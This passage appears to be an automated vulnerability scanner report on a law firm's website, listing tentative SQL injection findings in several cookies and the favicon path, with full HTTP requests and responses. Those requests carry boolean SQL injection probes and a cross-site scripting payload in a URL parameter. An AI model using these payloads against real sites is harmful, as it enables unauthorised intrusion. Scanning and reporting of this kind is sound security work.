<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /emaildisclaimer.cfm59265610'%20or%201%3d2--%20?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:07:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>



<script type="text/javascript">

</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.16. http://www.curtis.com/emaildisclaimer.cfm [__utma cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 60403110'%20or%201%3d1--%20 and 60403110'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:06:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.160403110'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">

</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.17. http://www.curtis.com/emaildisclaimer.cfm [__utmb cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21125157'%20or%201%3d1--%20 and 21125157'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:06:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.130314580321125157'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">

</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.18. http://www.curtis.com/emaildisclaimer.cfm [__utmc cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 14813370%20or%201%3d1--%20 and 14813370%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d1--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:06:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236714813370%20or%201%3d2--%20; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">

</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.19. http://www.curtis.com/emaildisclaimer.cfm [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16707661'%20or%201%3d1--%20 and 16707661'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:06:14 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">

</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.20. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/emaildisclaimer.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 12161945'%20or%201%3d1--%20 and 12161945'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:06:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">

</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.21. http://www.curtis.com/favicon.ico [CFID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.curtis.com
Path:	/favicon.ico

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 61658724%20or%201%3d1--%20 and 61658724%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:00:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175919;path=/
Set-Cookie: CFTOKEN=56500703;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>
